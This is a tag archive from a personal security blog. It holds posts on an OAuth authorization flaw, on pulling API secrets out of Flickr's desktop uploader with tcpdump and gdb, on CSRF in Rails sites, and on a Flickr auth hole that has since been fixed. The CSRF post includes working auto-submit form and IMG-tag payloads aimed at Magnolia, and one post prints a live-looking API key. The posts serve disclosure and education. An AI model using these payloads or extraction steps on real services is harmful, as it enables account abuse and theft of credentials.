Tag Archives: security

HDCP’s real purpose

The recent leak or crack of the HDCP key has mostly been discussed in terms media piracy. There is already plenty of Blu-Ray piracy – nobody’s going to bother capturing raw HDMI traffic and re-encode it when they can easily buy a ripper. What this will do is make it possible for more small chinese manufacturers to get in on the HD television manufacturing game. HDCP provided a high barrier to entry for manufacturers so we haven’t seen the proliferation of TV manufacturers that we’ve seen in virtually every other kind of electronics. I expect that to change. I’m looking forward to buying sketchy HDTVs in chinatown super cheap.

Understanding the OAuth vulnerability

Last night’s OAuth Security Advisory 2009.1 was a little light on the details. The blog post wasn’t much better. I was peripherally involved in the OAuth spec development and I couldn’t work out what the advisory meant without a bunch of thinking and spec reading so I thought I’d try to explain it in simpler terms here.

For my example I’ll use the real service Twitter and a theoretical service Twitten that lets users post to to Twitter in LOL-speak and authenticates via OAuth. Alice and Bob will be my attacker and victim.

Alice’s normal authentication process goes like this:

  1. Alice loads twitten.com/login
  2. Twitten creates a regular HTTP session for Alice
  3. Twitten asks Twitter for an unauthorized token
  4. Twitten redirects Alice to an URL on the Twitter servers that will allow her to authorize the token
  5. Alice clicks OK to authorize the token
  6. Twitter redirects Alice back to Twitten
  7. Twitten exchanges its unauthorized token for an access token (associated with Alice’s account) with Twitter and stores it in Alice’s session
  8. Alice makes inane posts on Twitter via Twitten

The vulnerability here is in step 4. If instead of going to the authorization URL Alice convinces Bob to go there and authorize Twitten she can gain access to his account. Like this:

  1. Alice loads twitten.com/login
  2. Twitten creates a regular HTTP session for Alice
  3. Twitten asks Twitter for an unauthorized token
  4. Twitten tells Alice what URL to go to to authorize the token, but she doesn’t go there
  5. Alice tells Bob, “if you love Twitter and kittens try out Twitten – go to http://twitter.com/oauth/authorize/….” (the authorization URL from Twitten)
  6. Bob loads the authorization URL with his Twitter credentials and authorizes the token
  7. Twitten requests Twitter to exchange the unauthorized token for an access token (associated with Bob’s Twitter account) and stores it in Alice’s session
  8. Alice goes to twitten.com and posts “OMG PWNd” to Bob’s twitter account

I’m not really sure how to address this issue. It’s fundamentally hard to establish trust between three parties over insecure communications. Hopefully more experienced people than me will come up with clever answers.

Update: changed wording to match Eran’s suggestion, his blog post on the subject is excellent reading.

A Different Model For Web Services Authorization

In my last post I set out to describe how easy it is to extract private keys from desktop software. As I was concluding I stumbled on an alternative approach that might be more secure in some circumstances. I didn’t really go into details, so here’s an expansion of the idea.

Current API authentication mechanisms including Flickr Auth, OAuth, Yahoo BBAuth and Google AuthSub work by allowing users to grant an application the right to act for the user on the site. Some implementations allow the user to grant access to only a subset of the functionality — Flickr lets users grant just read access, Google lets users grant access to just one class of data (for example Google Docs but not Google Calendar). But still, the user doesn’t know which specific operations they’re allowing to be carried out. This wouldn’t matter so much if the user can trust the application that they’re granting access to, but there’s no way to provide for that completely.

Another approach might be to give third-party applications the ability to submit sets of changes to be applied to a user’s account, but require the user to approve them through the service provider’s web site before they’re applied to the the user’s real data. For example, a Flickr upload might look like this:

  • Client makes API request flickr.transaction.create(total_files=20, total_data=20M)
  • Flickr responds with transaction id X and a maximum lifetime for the transaction
  • Flickr responds with an URL to direct the user’s browser to to:
    • associate the transaction with an account, and
    • preview, permit and commit the changes

To a user this isn’t going to look or feel to different from the current Flickr upload scenario where on completion they’re presented with a set of uploaded photos and offered the opportunity to make metadata changes.

The key advantage here from a security standpoint is that users approve actions not applications. The challenge of expressing a set of changes to a user clearly is not small but unlike the challenge of identifying and trusting applications it’s solvable.

This model probably only makes sense for write-oriented sessions, and for infrequent, large write sessions (such as Flickr uploads) rather than frequent, small writes (like Twitter posting).

These ideas aren’t well thought out in my head, they’re fresh from me trying to come up with a workable model for API authentication and authorization that doesn’t depend on trusting the identity of clients. I’d really welcome feedback and ideas on how to take this forward and feedback implementers on the feasibility of adopting a model like this.

No More Secrets

Using secret keys to identify applications communicating across the internet has become popular as people have copied the very successful Flickr authentication API. Unfortunately people trust that they can keep these keys secret from attackers, even as they distribute applications that contain the secret keys to other people. I decided to see how hard it would be to extract the secret key and API key from Flickr’s new XULRunner based Uploadr.

While the Uploadr is nominally open source, they don’t include the key in the source code. In the README they instruct anyone building it to acquire their own key and modify the source code to include that key:

You'll need your own API key and secret from Flickr to build Uploadr.
These can be obtained at http://flickr.com/services/api/.  The key
and secret must be placed in flKey.cpp as indicated.  This file is at:
  UPLOADR/MacUploadr.app/Contents/Resources/components/flKey.cpp

The API key is stored as a string.  The secret is stored as individual
characters so it is not easily readable from the binary.

Such noble goals.

Getting the API key was as simple as running tcpdump:

sudo tcpdump -i en1 -vvv -n -s 0 -w /tmp/DumpFile.dmp

running the Uploadr, and then looking through the dump file to find where the API key is passed. Look:

api_key=a5c4c07991a15c6b56b88005a76e7774

In theory getting the secret key is harder, but it turned out to be even easier. It’s stored in the source code for the flKey::Sign method:

	// The shared secret
#ifdef XP_MACOSX
	bytes[0] = '-';
	bytes[1] = '-';
	bytes[2] = '-';
	bytes[3] = '-';
	bytes[4] = '-';
	bytes[5] = '-';
	bytes[6] = '-';
	bytes[7] = '-';
	bytes[8] = '-';
	bytes[9] = '-';
	bytes[10] = '-';
	bytes[11] = '-';
	bytes[12] = '-';
	bytes[13] = '-';
	bytes[14] = '-';
	bytes[15] = '-';
#endif

All I need to do is find that code, disassemble it and reassemble the string. I ran the Uploadr under gdb:

gdb '/Applications/Flickr Uploadr.app/Contents/MacOS/xulrunner'

and once it was up and running tried to find something to break on that would expose the secret key. There weren’t symbols for the flKey::Sign method that’s defined in the source file but I found I could break on MD5Init that’s called from that function. So:

break MD5Init
kill
run

And now I stop in the middle of the signature function – and from the stack trace I can see where flKey::Sign begins:

Breakpoint 1, 0x149a086b in MD5Init ()
(gdb) where
#0  0x149a086b in MD5Init ()
#1  0x149a1588 in flKey::Sign ()
#2  0x017bb45d in NS_InvokeByIndex_P ()
...

All I have to do is disassemble flKey::Sign:

(gdb) disassemble 0x149a1588
Dump of assembler code for function _ZN5flKey4SignERK9nsAStringRS0_:
0x149a1498 <_ZN5flKey4SignERK9nsAStringRS0_+0>:	push   %ebp
0x149a1499 <_ZN5flKey4SignERK9nsAStringRS0_+1>:	mov    %esp,%ebp
0x149a149b <_ZN5flKey4SignERK9nsAStringRS0_+3>:	push   %edi
0x149a149c <_ZN5flKey4SignERK9nsAStringRS0_+4>:	push   %esi
...
0x149a153e <_ZN5flKey4SignERK9nsAStringRS0_+166>:	movb   $0xXX,(%eax)
0x149a1541 <_ZN5flKey4SignERK9nsAStringRS0_+169>:	movb   $0xXX,0x1(%eax)
0x149a1545 <_ZN5flKey4SignERK9nsAStringRS0_+173>:	movb   $0xXX,0x2(%eax)
0x149a1549 <_ZN5flKey4SignERK9nsAStringRS0_+177>:	movb   $0xXX,0x3(%eax)
0x149a154d <_ZN5flKey4SignERK9nsAStringRS0_+181>:	movb   $0xXX,0x4(%eax)
0x149a1551 <_ZN5flKey4SignERK9nsAStringRS0_+185>:	movb   $0xXX,0x5(%eax)
0x149a1555 <_ZN5flKey4SignERK9nsAStringRS0_+189>:	movb   $0xXX,0x6(%eax)
0x149a1559 <_ZN5flKey4SignERK9nsAStringRS0_+193>:	movb   $0xXX,0x7(%eax)
0x149a155d <_ZN5flKey4SignERK9nsAStringRS0_+197>:	movb   $0xXX,0x8(%eax)
0x149a1561 <_ZN5flKey4SignERK9nsAStringRS0_+201>:	movb   $0xXX,0x9(%eax)
0x149a1565 <_ZN5flKey4SignERK9nsAStringRS0_+205>:	movb   $0xXX,0xa(%eax)
0x149a1569 <_ZN5flKey4SignERK9nsAStringRS0_+209>:	movb   $0xXX,0xb(%eax)
0x149a156d <_ZN5flKey4SignERK9nsAStringRS0_+213>:	movb   $0xXX,0xc(%eax)
0x149a1571 <_ZN5flKey4SignERK9nsAStringRS0_+217>:	movb   $0xXX,0xd(%eax)
0x149a1575 <_ZN5flKey4SignERK9nsAStringRS0_+221>:	movb   $0xXX,0xe(%eax)
0x149a1579 <_ZN5flKey4SignERK9nsAStringRS0_+225>:	movb   $0xXX,0xf(%eax)
...
0x149a168e <_ZN5flKey4SignERK9nsAStringRS0_+502>:	pop    %esi
0x149a168f <_ZN5flKey4SignERK9nsAStringRS0_+503>:	pop    %edi
0x149a1690 <_ZN5flKey4SignERK9nsAStringRS0_+504>:	pop    %ebp
0x149a1691 <_ZN5flKey4SignERK9nsAStringRS0_+505>:	ret
End of assembler dump.

And sure enough if I reconstruct those bytes, the secret key is: REDACTEDREDACTED

That wasn’t too hard was it? The fact that the code around the key was open source made it easier to find but even if it was closed source if I knew what kind of algorithm I was looking for it wouldn’t be hard to find and examine. It’s pretty easy to trace forward from user input or backward from network IO to find the signature algorithm, and the secret’s always the input to that.

Unfortunately OAuth follows the same model as Flickr, placing some value in a consumer’s “private” key. They do mention in Appendix B.7 that it’s often possible for attackers to access a secret it’s still a vital part of the protocol.

Since it’s not possible to securely identify clients we should move to a model where users approve actions against their accounts rather than granting carte-blanche actions to clients. For example Flickr could put photos that are uploaded into a staging area and require approval on the web site before including them in a user’s photo stream. This would allow users to make a informed decisions about third-party access to their accounts.

Updated: at Flickr’s request I’ve removed the “secret” key.

Updated again: I made another post about this topic, expanding on the final paragraph of this post.

Insecurity is Ruby on Rails Best Practice

Update: This post is really really out of date. Please disregard most of what’s written here.

Ruby on Rails by default encourages developers to develop insecure web applications. While it’s certainly possible to develop secure sites using the Rails framework you need to be aware of the issues at hand and many technologies that make Rails a powerful easy to use platform will work against you.

Cross Site Request Forgery
CSRF is the new bad guy in web application security. Everyone has worked out how to protect their SQL database from malicious input, and RoR saves you from ever having to worry about this. Cross site scripting attacks are dying and the web community even managed to nip most JSON data leaks in the bud.

Cross Site Request Forgery is very simple. A malicious site asks the user’s browser to carry out an action on a site that the user has an active session on and the victim site carries out that action believing that the user intended that action to occur. In other words the problem arises when a web application relies purely on session cookies to authenticate requests.

Let’s look at a simple example. I want my site to add me to your 37Signals Highrise contact list.

37 Signals Highrise
Working out how to do this is pretty simple. I go to Highrise and take a look at the “Add a person” form in Firebug or using View Source. It’s a fairly straightforward form that submits to http://ianloic.highrisehq.com/people and has a bunch of fields. I can easily recreate that form on my own server. Since Highrise uses a different domain for each user I ask the user to enter their domain name. I use the same username I use everywhere else so it should be pretty easy to fool my user into giving me their Highrise domain name. Most other sites do not have unique per-user URLs.

The page is here and the source is here. Provided you’re logged in and you enter your highrise domain correctly clicking “Add me” will add my name to your contacts list because 37Signals’ servers have no idea that the request is not coming from their application.

It’s fairly straight-forward to modify a form like this to automatically submit on page load. It’s pretty easy to put it in an hidden IFRAME so the user doesn’t even know what’s going on.

By using a unique per-user URL the guys at 37 signals have made this exploit non-trivial. This is not the default behavior from the Ruby on Rails framework. By default action URLs are very predictable. For example if we take a look at the social bookmarking site Magnolia we see predictable URLs all over the place.

Magnolia
As soon as you log in to Magnolia you are presented with a form for adding a bookmark by typing in its URL. This is a fantastic user experience. Unfortunately for Magnolia’s users anyone that submits this form on their behalf can add bookmarks and the form’s action (http://ma.gnolia.com/bookmarks/quicksave) is the same for all users. A trivial page that adds a bookmark to a visitor’s Magnolia account would look like this (try it):

<html>
    <head><title>Ma.gnolia</title></head>
    <body onload="document.getElementById('f').submit()">
        <form id="f" method="post"
                action="http://ma.gnolia.com/bookmarks/quicksave">
            <input type="text" value="http://ian.mckellar.org/"
                name="url" id="url" type="hidden"></input>
        </form>
    </body>
</html>

But it gets even worse. Since by default Rails allows GET as well as POST submissions you can call an action from an IMG tag (try it):

<img src="http://ma.gnolia.com/bookmarks/quicksave?url=http://ian.mckellar.org/">

Magnolia is not unique in the behavior. Unless a site’s developer has gone out of their way to prevent it, this class of attacks will affect every Rails site. Most of the popular sites I’ve looked at exhibit some vulnerabilities.

Other Rails sites I’ve looked at attempt to do their input validation in JavaScript rather than in Ruby which leaves them open to JavaScript injection and hence XSS attacks. This is a far more serious attack that I can cover separately if there is interest.

Solutions
Easy Solutions
There aren’t any good easy solutions to this. A first step is to do referrer checking on every request and block GET requests in form actions. Simply checking the domain on the referrer may not be enough security if there’s a chance that HTML could be posted somewhere in the domain by an attacker the application would be vulnerable again.

Better Solutions
Ideally we want a shared secret between the HTML that contains the form and the rails code in the action. We don’t want this to be accessible to third parties so serving as JavaScript isn’t an option. The way other platforms like Drupal achieve this is by inserting a hidden form field into every form that’s generated that contains a secret token, either unique to the current user’s current session or (for the more paranoid) also unique to the action. The action then has to check that the hidden token is correct before allowing processing to continue.

This is a pain in the arse to write by hand.

What is really required at the Rails level is a of form API that can generate and consume forms securely. In Drupal all form HTML is generated and parsed by the framework. This allows application developers to protect themselves from XSRF without even knowing they are.

There’s a plugin called Secure Action but I’m not sure how well it works. The dependence on a static shared salt rather than a randomly generated secret in the user’s session concerns me. The way it puts the signature in the URL makes me nervous too. It’s better than nothing though.

Flickr Authentication Security

Recently Flickr closed a little security hole I found in their API authentication. I was able to convince their servers to hand out a token to me based on a user’s cookies and the API key and secret key of an application the user had used. Then with the JSON form of the Flickr API I had full access to the user’s account.

The there two flaws in Flickr’s security that exposed this problem. The first was that the security is based on the assumption that applications can keep a key secret. This is easy for web applications that make server to server API calls, but for anything that a user downloads and especially open source software it’s impossible to keep the key secret. My experiment used the secret key from Flock which is open source – the secret key can be found in subversion, and the secret key from Flickr’s own MacOS X uploader application which can be easilly extracted from the download from their site. Secondly the Flickr server was giving out new authentication tokens without requiring user approval.

The exploit itself is a little state-machine making a series of Flickr API calls and using one IFRAME. It goes like this:

  • Request a frob (via JSON)
  • Request authentication (via an IFRAME)
  • Request the auth token (via JSON)
  • Do evil (via JSON)

In my case the evil consisted of posting a comment on the user’s most recent photo.

The security hole is now closed, but if you’re interested in seeing how to access the Flickr API entirely from JavaScript in a web page take a look at the attached exploit: sploitr.html and the md5 library: md5.js